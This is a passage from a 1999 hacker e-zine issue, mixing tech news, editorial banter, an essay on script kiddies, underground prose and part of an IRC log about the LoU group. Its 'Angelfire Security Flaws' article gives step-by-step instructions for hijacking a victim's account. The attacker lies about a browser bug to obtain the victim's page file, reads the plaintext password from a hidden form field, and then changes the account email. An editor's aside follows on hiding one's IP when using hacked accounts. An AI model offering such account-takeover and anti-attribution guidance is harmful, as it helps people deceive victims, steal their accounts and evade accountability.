  741.       Parker, deputy director of the agency's competition bureau and first
  742.       chair for the upcoming March 9 trial, is the subject of a motion to
  743.       disqualify. Intel filed the motion under seal last month. The company
  744.       declined to comment on its grounds for disqualifying Parker, but
  745.       Parker's former law firm, O'Melveny & Myers, represented Advanced Micro
  746.       Devices in its court battles with Intel in the early '90s, and former
  747.       O'Melveny partner Tom McCoy left the firm to become AMD's general
  748.       counsel. An FTC spokesperson said that it had cleared Parker's
  749.       involvement in the case with two ethics experts. (CNET News -- For
  750.       complete story, see
  751.       
  752.       http://www.news.com/News/Item/0,4,32148,00.html?st.ne.ni.lh)
  753.  
  754.      
  755.      
  756.      Mucho thanks to Spikeman for directing his efforts to our cause of bringing
  757.      you the news you want to read about in a timely manner ... - Ed
  758.      
  759.      @HWA
  760.      
  761.      
  762.   2.0  From the editor.
  763.        ~~~~~~~~~~~~~~~~
  764.  
  765.      #include <stdio.h>
  766.      #include <insight.h>
  767.      #include <backup.h>
  768.  
  769.      main()
  770.      {
  771.       printf ("Read commented source!\n\n");
  772.       
  773.      /*             
  774.       *Ok kiddies we're pumping out some more stuff here as we steamroll into  
  775.       *issue #6 i'm wondering if we can really pull off a weekly release as
  776.       *hoped. I mean hopefully not too many people are getting caught and not
  777.       *too many sites (bah hahahaha yeah right) are being vandalized by the script
  778.       *kiddiez etc. Work continues on hwa-iwa.org which is running Debian Linux at
  779.       *this time, i'm playing around with some stuff there but don't bother port
  780.       *scanning etc u won't find anything interesting on that box unless you really
  781.       *want to snarf half written articles <grin> etc ... besides if you did break
  782.       *in i'd just end up writing a story about it so whats the point? *g* moving
  783.       *right along, thanks for the continued support everyone and tty next time...
  784.       */
  785.       printf ("EoF.\n");
  786.       }
  787.  
  788.  
  789.       www.hwa-iwa.org is now online but not ready for primetime yet, if you go
  790.       there you will just be presented with a link to the HWA.hax0r.news mirrors
  791.       the site is under major development and will be announced here when it goes
  792.       "online for primetime" with webboard and file archives etc etc, stay tuned
  793.       for more as it becomes available ie: as I get it done ... ;)
  794.       
  795.       Issue #6! ... w00t w00t w00t! ... 
  796.       
  797.       w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk.
  798.         1. A transcursion or transcendance into joy from an otherwise inert state
  799.         2. Something Cruciphux can't go a day without typing on Efnet
  800.      
  801.       Congrats, thanks, articles, news submissions and kudos to us at the
  802.      main address: hwa@press.usmc.net complaints and all nastygrams and 
  803.      mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 
  804.      127.0.0.1, private mail to cruciphux@dok.org
  805.  
  806.      danke.
  807.  
  808.      C*:.
  809.  
  810.  
  811.      @HWA
  812.      
  813.      
  814.          
  815.                     
  816.   3.0 The Future of Hacking by pH4RcYd3
  817.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  818.             
  819.       -------------------------
  820.        The Future of Hacking
  821.       =========================
  822.              
  823.       by pH4RcYd3!pDX
  824.       [ pArAd0x ]
  825.       
  826.       pH4RcYd3@hotmail.com
  827.         
  828.  
  829.         The future of Hacking some people do not think about...But as I was
  830.       browsing CyberArmy.com's WWWBoard for some interesting conversations I
  831.       was bombarded by messages saying "Anyone have a Win98 Spoofer" and "How
  832.       do you find out someone's IP number in AOL" and such things like that. 
  833.       
  834.        These tell me one thing about a  person...LAMER! These people do not
  835.       know any other OS except Winblowz and like to nuke and punt people for 
  836.       whatever immature reason. They like to send out virii and scerew up 
  837.       someone's computer for no absolute reason. If I ever met one of these 
  838.       people in person you know what I would see? I would see a 13 yr. old boy
  839.       (or girl) cowering behind his WinNuke walking around a computer store 
  840.       asking people if they memorized there IP number and if they did, can they
  841.       give it to him. Now I realize that i'm generalizing packet warriors at 
  842.       around teen years, but I won't be quick to speak for all 13 yr olds. Some
  843.       of them may have a great understanding of Unix and all its other variations
  844.       and might be more l33t than yours truly. But if you've ever gotten into a 
  845.       fight with someone from AOL, or any other packet warrior they think there 
  846.       hackers and they try to mailbomb you and nuke you, icmp you, and any other
  847.       windows based attack. Not to say that I hate AOL, it's just some packet 
  848.       warrior newbies, meaning new to DoS attacks and such are usually from AOL,
  849.       and they started out using punters. In fact I think AOL is good for people
  850.       that don't have that much experience with being online and on the internet,
  851.       AOL provides a lovely user interface, and is definitely user friendly. Now
  852.       if these people ever got into Linux they would probaly be teardropping and
  853.       smurfing everybody but that's not the case because there to illiterate to 
  854.       new information. 
  855.       
  856.        The information they could find on Webpages by spending 2 to 3 hours 
  857.       everyday reading articles is amazing. But they choose not to. I didn't say
  858.       they were to dumb to learn how to use any other OS, or to learn some of the
  859.       flaws of a system. They just don't want to, to learn something you have to 
  860.       want to learn it. But when they finally, maybe, when when they r00t there 
  861.       first server, they usually did it by an exploit. Script kiddies aren't that
  862.       bad, to exploit the bug in the system you must first upload the exploit, to
  863.       upload something you need an account? How did they get the account? Well 
  864.       probaly by getting the passwd file and cracking it if it's not shadowed. 
  865.       This is better than having them running around IRC shoving packets down 
  866.       peoples throats. At least there out there learning atleast SOMETHING from
  867.       hacking a server. 
  868.       
  869.         I would rather have them find some other way to gain entry to a server 
  870.       but hey, somethings will never change. I'm truly interested too see what
  871.       the future of Hacking will have instore for us. 
  872.       
  873.       What did u think of this article? Drop me a line at 
  874.       <a href="mailto:pH4RcYd3@hotmail.com">pH4RcYd3@hotmail.com</a>      
  875.  
  876.      @HWA
  877.      
  878.      
  879.  3.1   Angelfire Security flaws by pH4RcYd3
  880.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  881.        
  882.        ============================
  883.         Angelfire Security Flaws
  884.         by pH4RcYd3(@hotmail.com)
  885.            pDX![ pArAd0x ]
  886.        ----------------------------
  887.  
  888.        Slightly reformatted/edited for clarity - Ed
  889.        
  890.       Introduction
  891.       ~~~~~~~~~~~~
  892.  
  893.     Earlier in the year, I found an article on the web that eZoOns wrote
  894.       about hacking Angelfire. The method of social engineering and method to
  895.       hack Angelfire was insignificant. I offer you what I think is a better 
  896.       article. Remember this is for educational purposes only and I take no 
  897.       responsibility for what you might do with this information.
  898.  
  899.       First Things First
  900.       ~~~~~~~~~~~~~~~~~~
  901.       
  902.     Well first you have to get the page that you get right after you login 
  903.       to your Angelfire account. This page is called BEDIT.HTML And a couple 
  904.       ines down from the <html> is their password. 
  905.       
  906.       <font color=teal>Your page 
  907.        <a href="http://www.angelfire.com/ak2/r00t7/index.html">
  908.        http://www.angelfire.com/mi/KrazieBread/index.html </a> has been saved.
  909.       <br>
  910.       You may have to click Reload or Super-Reload (Shift+Reload) to see your 
  911.        edited page and not your old version when you go to your URL.
  912.       <br>You can also announce your new page on 
  913.       <a href="http://homepages.whowhere.com/bin/showpage.pl?add">WhoWhere?</a>, 
  914.       <a href="http://newtoo.manifest.com/"><u>What's New Too!</u></a>, or if you
  915.        really want to get noticed, go to <a href="http://www.submit-it.com/">
  916.        <u>Submit It!</u></a><br>Tune up your Web Site at the 
  917.        <a href="http://www.angelfire.com/cgi-bin/ct?ad=websitegarage&vp=/index.
  918.         clicked&ru=http://www.websitegarage.com/whowhere">Web Site Garage</a>.</font>
  919.       </td></tr></table></center>
  920.       <form select method="post" action="http://www.angelfire.com/cgi-bin/bedit">
  921.       <input type="hidden" name="storage"  value="mi">
  922.       <input type="hidden" name="hpd"      value="r00t">     
  923.       <input type="hidden" name="password" value="r00t7">  <-------THE PASSWORD!!!
  924.  
  925.      Alright so now you know where the password is, finding the username is a synch 
  926.      because it's in their URL. Http://www.angelfire.com/whatever/USERNAME/
  927.      
  928.       This is a dumb flaw in the Angelfire user security, yet a very dangerous one if used
  929.      right.Kind of lame actually.
  930.      
  931.      Moving in for the Kill
  932.      ~~~~~~~~~~~~~~~~~~~~~~
  933.     Ok first things first
  934.  
  935.      1.)  Find some guy that you want to hack and tell him that you found a bug 
  936.           in IE 4.0 and Netscape Communicator that let's you install keyloggers 
  937.           and packet sniffers on their system through a perl script. 
  938.  
  939.      2.)  Tell the guy you need his bedit.html page because you need some of the
  940.           info on there, cause if you don't have it the script won't work.
  941.  
  942.      3.)  After he sends u the file get the shit you need...Login, and then from 
  943.           the bedit.html page click change e-mail (don't use your real one) one 
  944.           from Hotmail or something.
  945.  
  946.      4.)  Whatever you want to do with the page is your choice, but remember..
  947.           be mature about it and don't do anything you'll regret later..that 
  948.           line sounded stupid.
  949.  
  950.      Conclusion
  951.      ~~~~~~~~~~
  952.     Well I hope you've enjoyed this article. Thanx to eZoOns for discovering
  953.      this vulnerability in the Angelfire system. And greetz to IllumiTIE, 
  954.      Big Cheese, JellyNuts, Optiklenz, GodsHippy, Legion2000, HcV, HFG, and all
  955.      black hat hackzers!#%^
  956.      
  957.      
  958.      Side note;
  959.      ~~~~~~~~~~
  960.       BTW, although Hotmail is a favourite of 'hackers' make sure you all realize
  961.      that whatever ip you are logged in from when sending a message is INCLUDED
  962.      in the HEADERS of your message. Not everyone can see these if they are using
  963.      some shit software by a small concern called Mircosloth or Mickeysnoft or 
  964.      some wacked shit like that so be forewarned, HOTMAIL IS NOT ANONYMOUS and using
  965.      a hacked acct to send the mail can be incriminating so be careful, use a mail
  966.      forwarding service like netaddress and nightmail, anyone wanna do an article 
  967.      on anonymous mailing/receiving? - Ed
  968.      
  969.      @HWA
  970.      
  971.      
  972.   3.2 Some underground prose by Liquid Phire 
  973.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  974.       
  975.       I really liked this, it grabs you by the short hairs and pulls tightly
  976.       read it and understand, for this is very much what it is like to be a 
  977.       part of the underground as a newbie and beyond. - Ed
  978.       
  979.       
  980.       
  981.       Reorder
  982.       (c) 1999 phiregod
  983.       
  984.       i am a hunter, searching this underground of electricity for an indiana 
  985.       jones-esque treasure. i plunge through the piles of bullshit, and sever 
  986.       the arteries of the sane. i found god, and i wasnt pleased, i found the 
  987.       messiah, and i wasnt saved. my very soul did i lay upon the altar, and 
  988.       when i lost it, i found it never was. 
  989.       
  990.       machiavellian superheros shook my hand and turned their backs. my vision 
  991.       was clouded by the ciggerette smoke, and my voice was hindered by a well 
  992.       meaning gag. i placed my hands on the planchette and found the answer 
  993.       that i already knew.
  994.       
  995.       on a bloody sunday, i covered my eyes as to not see the plague. i felt 
  996.       the refreshing rain of revolution on my burning skin and i cried. i 
  997.       climbed the highest mountian i could find, surmounted the greatest 
  998.       challange and i found not even that was enough to distract me from the 
  999.       pain i felt. there are too many people to save, too many to even count.
  1000.       
  1001.       i read every bit of weathered parchment that i coud find, i plundered 
  1002.       the the lair of every thief in search of text that would provide 
  1003.       redemption. i gazed into the cherubic eyes, i smiled back at the chesire 
  1004.       grins, i found no path to follow. at this point it was obvious that i 
  1005.       would have to cut the road myself.
  1006.       
  1007.       The line was busy.
  1008.       The line was busy.
  1009.       The line was busy.
  1010.       The line was busy.
  1011.       The line was busy.
  1012.       
  1013.       as a draw another breath through my hookah of modern voodoo an image of 
  1014.       a brave new world floods my mind. this sarcophagus of a free medium is 
  1015.       merely another channel to convey advertisements. the few that dare to 
  1016.       betray what they were born for, are hunted by those that serve the 
  1017.       institution that we call a government. this house of cards that we 
  1018.       reside in will not protect us from the inevitable storm.
  1019.       
  1020.       i have joined the danse macabre, i close my eyes to avoid the light. in 
  1021.       this year 1984 i feel forced to conform to a norm that doesnt exsist. 
  1022.       fleeting glimpses of a better place catch my eye as i take the hand of 
  1023.       anubis and desend into the world i belong. in these apocalyptic times it 
  1024.       is easier to turn away then to face the fight.
  1025.       
  1026.       i listen to the anthems of every power crazed country, i've found 
  1027.       occasion to sing along, looking for a cause to fight for. more people 
  1028.       here are looking for fame and fortune, i became a god when i lost the 
  1029.       desire to obtain what i couldnt have. i was baptized in the runoff the 
  1030.       the information super highway, yes, it even rains in hell.
  1031.       
  1032.       i've shed my armor of warez, i burned the castle of manuals, and i'm 
  1033.       trying to say what others cant put into words. i followed dante's 
  1034.       footsteps, and i drank hamlet's wine. if i'm going to die then i have 
  1035.       nothing left to lose. if i seek not fame or fortune, i have nothing left 
  1036.       to win. i want every scrap of information that was ever given birth to 
  1037.       in this maquis, i seek to become the personifacation of what no one can 
  1038.       have.
  1039.       
  1040.       this is the manifesto of the product of modern life; money, comic books, 
  1041.       games, knowledge, and sex. i'm not claiming everyone belives this, i 
  1042.       doubt many of the few that will read it will understand in a vauge way 
  1043.       what i am trying to say. thats not a bad thing, the more poeple that are 
  1044.       blind, the easier it will be to slip by unnoticed. this is where i 
  1045.       belong, a faceless name, in all the faceless names that swarm the 
  1046.       internet.
  1047.       
  1048.       phiregod
  1049.       
  1050.       comments: liquidphire@hotmail.com
  1051.             cc: hwa@press.usmc.net
  1052.       
  1053.       I took the liberty of naming this piece "reorder" the phreaks will 
  1054.       understand this one, hope phiregod doesn't mind, keep writing and 
  1055.       don't give up, some of us do understand ... - Ed
  1056.       
  1057.       
  1058.       
  1059.       
  1060.       @HWA   
  1061.      
  1062.   4.0 The LoU irc log with comments from ex-LoU member Bronc Buster
  1063.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1064.       
  1065.       I was unable to release this earlier because my source was not given permission
  1066.       to pass this on, however things have settled somewhat and it is now "ok" to 
  1067.       include here so here it is in its' entirety, hopefully it will shed a bit of 
  1068.       light on the whole LoU situation or at least add to the intrigue, unabridged
  1069.       please note that none of this information has been confirmed and the source is
  1070.       "unknown" please remember this when reading, however it does look legit and jives
  1071.       with what we have seen in the past regarding the LoU story, machine names of people
  1072.       joining the chat have been REMOVED by me for obvious reasons ... 
  1073.       
  1074.       * NOTE * An informative message and some enlightened words follow this log 
  1075.       (no apologies for the length we try to put out news with as little 'editing' as
  1076.       possible..) from Bronc Buster whom has, effective two days prior to this writing
  1077.       resigned from LoU on friendly terms. - Ed
  1078.       
  1079.       
  1080.       Subject: IRC log
  1081.       Date: Thu, 21 Jan 1999 19:36:16 +0100
  1082.       From: "John" <ruffneck@xxxxxxx.xxx>
  1083.       To: <cruciphux@dok.org>   
  1084.      
  1085.      
  1086.      Hi!
  1087.      
  1088.      <snip>
  1089.      
  1090.      Here's the complete log of the IRC meeting of LoU and others...
  1091.      
  1092.      <snip>
  1093.      
  1094.      Session Start: Wed Jan 20 02:34:46 1999
  1095.       * Logging #event to '#event.log'
  1096.       [02:34] *** Now talking in #event
  1097.       [02:38] *** Joins: kInGb0nG (~lil_b0ng@*!*.com)
  1098.       [02:45] *** Joins: m0f0__ (synnergy@*!*.??)
  1099.       [02:46] *** m0f0 is now known as fewer
  1100.       [02:47] <delam> heh
  1101.       [02:47] <m0f0_> is it fixed yet?
  1102.       [02:48] <delam> which problem is that?
  1103.       [02:48] <m0f0_> the bitchx one
  1104.       [02:48] <delam> I'm compiling bitchx right now on the server
  1105.       [02:48] *** Quits: feur (irc, where is the wizard of OZ)
  1106.       [02:48] <m0f0_> ok, i compiled, epic, ircii, sirc.. but i don;t like them
  1107.       all
  1108.       [02:49] *** Quits: m0f0- (Leaving)
  1109.       [02:49] *** Quits: fewer (Leaving)
  1110.       [02:49] *** Quits: m0f0__ (Hey!  Where'd my controlling terminal go?)
  1111.       [02:49] *** m0f0_ is now known as m0f0
  1112.       [02:49] <delam> what did you find bitchx was doing or not doing?
  1113.       [02:49] <m0f0> it says nick not registered yet
  1114.       [02:50] <m0f0> you can join a channel, but not talk in there
  1115.       [02:51] *** Joins: feur (~cifer@*!*.rr.com)
  1116.       [02:51] <delam> weird
  1117.       [02:54] <dyslexia> some people are still getting a no more connectiions i=
  1118.       n
  1119.       your class message
  1120.       [02:55] <delam> that's bizzare.. lemmy check the classes 1 more time
  1121.       [02:55] <m0f0> rehash the server?
  1122.       [02:55] *** Joins: lothos (lothos@*!*.??)
  1123.       [02:57] <delam> class 10 is set to 100, class 2 is set to 50 and class 1 =
  1124.       is
  1125.       set to 400
  1126.       [02:58] <delam> just HUP'ed to make sure it's loaded
  1127.       [02:58] *** Joins: cd (~gerrie@*!*.net)
  1128.       [02:58] <m0f0> ok, let's see then
  1129.       [03:00] <optiklenz> ok
  1130.       [03:00] *** Joins: sdak (synnergy@*!*.net)
  1131.       [03:00] *** Quits: sdak (BitchX by any other name is still BitchX)
  1132.       [03:00] <m0f0> bitchx still flips here, bleh
  1133.       [03:00] *** Joins: Kanuchsa (das@*!*.com)
  1134.       [03:02] *** Joins: DigiEbola (digi@*!*.net)
  1135.       [03:02] <DigiEbola> ok
  1136.       [03:02] <DigiEbola> cant you this type?
  1137.       [03:02] <m0f0> yeah, you dweeb
  1138.       [03:03] * feur is away, autoaway [log:ON] [page:ON]
  1139.       [03:03] *** Quits: Kanuchsa (: Xing)
  1140.       [03:03] *** Joins: Winn (Winn@*!*.uu.net)
  1141.       [03:03] *** Joins: MsIW (Beachie@*!*.uu.net)
  1142.       [03:04] *** Parts: lothos (lothos@*!*.??)
  1143.       [03:04] *** Joins: lothos (lothos@*!*.jp)
  1144.       [03:05] *** lothos is now known as lothos-
  1145.       [03:06] *** Quits: MsIW (Hey it has been fun! Thanks!!! Hugs!!! Kiss!!!)
  1146.       [03:06] <m0f0> heh
  1147.       [03:07] <DigiEbola> heh
  1148.       [03:07] <Winn> What happned to MS?
  1149.       [03:07] * m0f0 wonders
  1150.       [03:07] <lothos-> .
  1151.       [03:08] <DigiEbola> uggy uggy ircII
  1152.       [03:08] <Winn> shes had dialup probs
  1153.       [03:08] <Winn> delam - dude!
  1154.       [03:08] <delam> hey :)
  1155.       [03:08] *** Joins: Mark668 (~irc@*!*.pacbell.net)
  1156.       [03:08] <feur> allright, we are waiting for some folks then we will begin=
  1157.       ,
  1158.       [03:08] <Winn> we're wating for a couple more.
  1159.       [03:08] <delam> winn I think I'm outdated here heh
  1160.       [03:08] <Winn> hehehehe... who;s the oldest here?
  1161.       [03:09] <Mark668> 46
  1162.       [03:09] <m0f0> woo
  1163.       [03:09] <feur> 49
  1164.       [03:09] <Mark668> Yo, Lou.
  1165.       [03:09] <DigiEbola> 69 1/2
  1166.       [03:09] *** Joins: MsIW (Beachie@*!*.uu.net)
  1167.       [03:09] <delam> not to sound like "I remember the old days" but I did mos=
  1168.       t
  1169.       of my IRC in 90-91
  1170.       [03:10] <Winn> I am not OLD!!! :-)
  1171.       [03:10] <MsIW> Winn is old.
  1172.       [03:10] <MsIW> :)
  1173.       [03:10] <Winn> shut up!
  1174.       [03:10] <MsIW> LOL!!!
  1175.       [03:10] <Winn> 3 years and counting iw
  1176.       [03:10] <feur> 5 minutes and counting
  1177.       [03:10] <Winn> who are we missing?
  1178.       [03:11] <lothos-> I'm ahhh 20.  I thought I was old...
  1179.       [03:11] <m0f0> alot
  1180.       [03:11] <delam> I have some old logs with the MOD/LOD wars in #hack on th=
  1181.       e
  1182.       original IRC server :)
  1183.       [03:11] <optiklenz> 24 here
  1184.       [03:11] <optiklenz> who's the oldest?
  1185.       [03:11] <DigiEbola> im going to be 22 next month
  1186.       [03:11] <kInGb0nG>  26
  1187.       [03:11] <m0f0> i love to be 18
  1188.       [03:11] * optiklenz waits patiently
  1189.       [03:11] <Winn> i was once... when I was in r'n'r
  1190.       [03:11] <m0f0> esp in the netherlands..
  1191.       [03:11] <Winn> if that where you are?
  1192.       [03:12] <m0f0> heh
  1193.       [03:12] <dyslexia> heh
  1194.      [03:12] <Winn> Mofo - say hi to Rene.
  1195.       [03:12] <m0f0> hmm
  1196.       [03:12] *** Joins: legions (~fff@*!*.net)
  1197.       [03:12] *** legions is now known as datapleX_
  1198.       [03:12] <datapleX_> hrm
  1199.       [03:13] <optiklenz> legions?
  1200.       [03:13] <optiklenz> ah
  1201.       [03:13] <DigiEbola> hah
  1202.       [03:13] * datapleX_ shrugs
  1203.       [03:13] <optiklenz> basterd
  1204.       [03:13] <m0f0> he must feel eweet
  1205.       [03:13] <optiklenz> heh
  1206.       [03:13] <kInGb0nG> heh
  1207.       [03:13] <datapleX_> optik: it somehow got to mah alternative in mirc
  1208.       [03:13] <optiklenz> ah
  1209.       [03:13] * DigiEbola is not going say a word about windows tonight.
  1210.       [03:13] *** datapleX_ changes topic to 'bah?'
  1211.       [03:13] *** Quits: datapleX (Read error to
  1212.       datapleX[tcnet06-26.sat.texas.net]: EOF from client)
  1213.       [03:13] <optiklenz> hehe
  1214.       [03:13] *** datapleX_ is now known as datapleX
  1215.       [03:13] <optiklenz> i was going to say that
  1216.       [03:13] <m0f0> bitchx, sirc don't work on this server
  1217.       [03:14] *** Quits: lothos- (Excess Flood)
  1218.       [03:14] <Mark668> I've not used irc much --- what's all the "heh"s mean?
  1219.       [03:14] <delam> hahah japan? :)
  1220.       [03:14] <m0f0> like, doh?
  1221.       [03:14] <optiklenz> when someone says something funny
  1222.       [03:14] <optiklenz> you say heh
  1223.       [03:14] <Mark668> Thanks.
  1224.       [03:14] <DigiEbola> mark: its the digital equivelent to a laugh
  1225.       [03:14] <DigiEbola> heh
  1226.       [03:14] <m0f0> heh
  1227.       [03:14] <DigiEbola> try it
  1228.       [03:14] <DigiEbola> =3D)
  1229.       [03:14] <Mark668> Heheheheheheheh
  1230.       [03:14] <m0f0> aww
  1231.       [03:15] <DigiEbola> THERE YA GO!
  1232.       [03:15] <m0f0> we made him laugh
  1233.       [03:15] *** Joins: maquis (~me@*!*.internic.net)
  1234.       [03:15] * optiklenz claps
  1235.       [03:15] <Mark668> That felt virtually good
  1236.       [03:15] <delam> MuahahahaHAHAHAHaHAHaHA
  1237.       [03:15] <maquis> ahhhh
  1238.       [03:15] <delam> :)
  1239.       [03:15] <m0f0> lol
  1240.       [03:15] <optiklenz> grand job
  1241.       [03:15] <MsIW> welcome maquis
  1242.       [03:15] <maquis> hello all
  1243.       [03:15] <dyslexia> now thats an evil laugh
  1244.       [03:15] <DigiEbola> bwahahaha
  1245.       [03:15] <optiklenz> welcome out of the sockets of being a "heh" virgin
  1246.       [03:15] <maquis> <DEVIOUS CACKLE HERE>
  1247.       [03:15] <Mark668> What time do we start?
  1248.       [03:15] <datapleX>  when is the meeting officialing beginning?
  1249.       [03:15] <maquis> I was told 2100 ET
  1250.       [03:15] <optiklenz> I'm not even sure of what this whole things about
  1251.       [03:15] <m0f0> 15 mins ago
  1252.       [03:16] <Winn> <HEH> should trigger Shockwave
  1253.       [03:16] <optiklenz> so again my curiousity is getting the best of me
  1254.       [03:16] <Mark668> Yep.
  1255.       [03:16] *** Joins: lothos (lothos@*!*.net)
  1256.       [03:16] <Mark668> Back in a minute ... I need another glass of wine.
  1257.       [03:16] <Winn> red I hope
  1258.       [03:16] <DigiEbola> curiosity killed the cat, so whylome wont
  1259.       [03:16] <m0f0> hmm, let do some weed then also
  1260.       [03:16] <delam> John Lee used to be the most annoying bastard in IRC back=
  1261.       in
  1262.       1991 with his substitution program
  1263.       [03:16] *** Joins: Father (Agrosso@*!*.att.net)
  1264.       [03:17] <Winn> welcome father!
  1265.       [03:17] <maquis> <-- genuflects
  1266.       [03:17] <delam> forgive me father for I have sinned
  1267.       [03:17] <Winn> damn right
  1268.       [03:17] <delam> heh
  1269.       [03:18] <DigiEbola> father, yes son, i wanna kill you.....
  1270.       [03:18] <delam> winn I don't think these guys even know our episodes
  1271.       [03:18] * MsIW bows to the higher power
  1272.       [03:18] <m0f0> zZZzz
  1273.       [03:18] <datapleX> digi: I am thinking of an orbital song right now...
  1274.       [03:18] <datapleX> ;)
  1275.       [03:18] <m0f0> i'm thinking of my girl
  1276.       [03:18] <DigiEbola> data: ah youngone
  1277.       [03:18] <m0f0> she's wild
  1278.       [03:19] <DigiEbola> m0f0: does she do things, real fast and then real slo=
  1279.       w?
  1280.       [03:19] <m0f0> heh
  1281.       [03:19] <m0f0> you moron
  1282.       [03:19] <DigiEbola> hahaha
  1283.       [03:19] <m0f0> Digi: what about your gaymate?
  1284.       [03:20] <DigiEbola> m0f0: myself more like it
  1285.       [03:20] <feur> let's begin, as others will join
  1286.       [03:20] *** Joins: pent (dschwarz@*!*.net)
  1287.       [03:20] <DigiEbola> m0f0: it really is a problem, when i argue with
  1288.       myself....
  1289.       [03:20] <lothos> let's start
  1290.       [03:20] <maquis> start away
  1291.       [03:21] <Winn> feur - you set the stage please
  1292.       [03:21] <datapleX> WOW...what a great start that was :)
  1293.       [03:21] <MsIW> I agree lothos
  1294.       [03:21] <maquis> ...the drum roll please.....
  1295.       [03:21] <lothos> thanks Ms. IW
  1296.       [03:21] <feur> i understand there is an attorney amongst us
  1297.       [03:22] <Winn> That would be father
  1298.       [03:22] <datapleX> maybe we could start w/ an introduction so that we can
  1299.       establish who is who?
  1300.       [03:22] <optiklenz> that'd be nice
  1301.       [03:22] <Father> Who goes first?
  1302.       [03:22] <m0f0> why are we here?
  1303.       [03:23] <Winn> I am Winn Schwartau, Infowar.Com - no handle. :-)
  1304.       [03:23] <lothos> I am Lothos. :-)
  1305.       [03:23] <Winn> that helps! :)
  1306.       [03:23] <lothos> RootFest organizer, member of LoU
  1307.       [03:23] <optiklenz> I'm Steve Stakton www.legions.org
  1308.       [03:23] <optiklenz> you guys know the handle
  1309.       [03:23] <optiklenz> =3D]
  1310.       [03:23] <m0f0> I am m0f0, now from africa
  1311.       [03:23] <lothos> www.rootfest.org
  1312.       [03:23] <maquis> I am Maquis (Rick) work at Internic...friend of INFOWAR.=
  1313.       COM
  1314.       [03:23] <datapleX> heh
  1315.       [03:23] <delam> I am the Evil Dr. Delam, 2600 writer.. cover of spring 19=
  1316.       96
  1317.       :), phrack, empire times, etc, writer of the first keystroke capture prog=
  1318.       ram
  1319.       DEPL.. etc etc
  1320.       [03:23] <dyslexia> i am dyslexia, currently residing underneath you all
  1321.       [03:24] <DigiEbola> I am Digital Ebola , LoU member, Senior Editor of Kee=
  1322.       n
  1323.       Veracity
  1324.       [03:24] <datapleX> uhm...I would be someone no one knows, or really cares=
  1325.       to
  1326.       know
  1327.       [03:24] <lothos> i THOUGHT I'd be in 2600, but the new issue came out and=
  1328.       I
  1329.       guess not...
  1330.       [03:24] <lothos> heh
  1331.       [03:24] <kInGb0nG> kingb0ng, software developer, LoU member
  1332.       [03:24] <maquis> is the new ish out yet, then?? havent seen it anywhere
  1333.       [03:24] <MsIW> I suggest that Winn or Feur begin this gig
  1334.       [03:24] <datapleX> feur: who are you?
  1335.       [03:24] <feur> i am just an old man who futz's with infosec
  1336.       [03:24] <datapleX> k
  1337.       [03:24] <datapleX> ...go ahead
  1338.       [03:25] <Winn> OK. A couple years back, some hackers decided to declare w=
  1339.       ar
  1340.       on France. They wanted CNN to watch and asked me to help.
  1341.       [03:25] * optiklenz slips on his foot warmer
  1342.       [03:25] <Winn> I advised them that would be a bad idea and finally with t=
  1343.       he
  1344.       help of some understanding feds talked them out of it.
  1345.       [03:25] <Winn> So, I guess, we are interested in where the current
  1346.       activities are taking us. Comments?
  1347.       [03:25] <optiklenz> ok
  1348.       [03:26] <Winn> So, recently, as I heard it, LoU chose China and Iraq as
  1349.       targets. Is that right?
  1350.       [03:26] <optiklenz> first I'd like to clear up some misconceptions brough=
  1351.       t
  1352.       about by some bad press
  1353.       [03:26] <Winn> Thank you!!
  1354.       [03:26] <maquis> most of it's bad press.
  1355.      
  1356.       [03:26] <optiklenz> ok
  1357.       [03:27] -pent:#event- betty, come to elite.net for a sec please
  1358.       [03:27] <optiklenz> The press for so long has been so occupied with makin=
  1359.       g
  1360.       news they are not concentrating on reporting the news
  1361.       [03:27] <optiklenz> LoU is devised of members who enjoy all aspects of
  1362.       computing and hold strong ethics
  1363.       [03:28] <optiklenz> A few of the members decided to speak out against the
  1364.       current human rights issue as it is in china
  1365.       [03:28] -pent:#event- he wanted me to call barry person collect, but i
  1366.       chickened out
  1367.       [03:28] -pent:#event- thats the last i saw of him
  1368.       [03:28] <optiklenz> the actions they decided to make was that of those
  1369.       members, and those members alone at that moment, and time LoU was not
  1370.       interested in anything they were doing although our support was there
  1371.       [03:29] -pent:#event- why is the talking screwed up ?
  1372.       [03:29] <optiklenz> Most of the members have high paying network jobs so =
  1373.       no
  1374.       one really had the time
  1375.       [03:29] -pent:#event- : idle     : 2 hours 30 mins 56 secs (signon: Tue J=
  1376.       an
  1377.       19 18:11:19 1999)
  1378.       [03:29] -pent:#event- he fell asleep
  1379.       [03:30] <m0f0> someone kill pent?
  1380.       [03:30] <datapleX> pent: please quit using notices
  1381.       [03:30] <datapleX> who here is a federal agent of some kind?
  1382.       [03:30] <lothos> not me!
  1383.       [03:30] <optiklenz> We never said we were going to "destroy" anything
  1384.       [03:30] <maquis> not me
  1385.       [03:30] <Winn> none I know of
  1386.       [03:31] <lothos> I was told there would be an fbi agent of some sort here.
  1387.       [03:31] <optiklenz> all though by word of mouth, and the press putting in
  1388.       their two cents it was stated that it was our goal to totally shutdown th=
  1389.       ese
  1390.       other countries
  1391.       [03:31] <feur> there is currently none on, if one comes on, we will
  1392.       immediately notify the channel
  1393.       [03:31] <optiklenz> That sounds like something out of a sci-fi flick
  1394.       [03:31] <datapleX> was one invited?
  1395.       [03:31] <Winn> What "manifesto" so-to-speak created the impression of
  1396.       infrastructure targeting?
  1397.      [03:31] <MsIW> major lag  back in a minute
  1398.       [03:31] <feur> yes, two were
  1399.       [03:32] <optiklenz> none of them
  1400.       [03:32] <optiklenz> our primary goal was the bring awareness
  1401.       [03:32] <optiklenz> nothing more nothing less
  1402.       [03:32] <MsIW> yes dataplex.  one was invited
  1403.       [03:32] *** Quits: MsIW (Hey it has been fun! Thanks!!! Hugs!!! Kiss!!!=0F=
  1404.       )
  1405.       [03:32] <delam> was it the press that got screwed up or did someone pose =
  1406.       as
  1407.       a member and say this stuff?
  1408.       [03:32] <Winn> Human rights in China... and Iraq?
  1409.       [03:32] <lothos> one was? or two?
  1410.       [03:33] <lothos> mosthated posed as a member for some press release
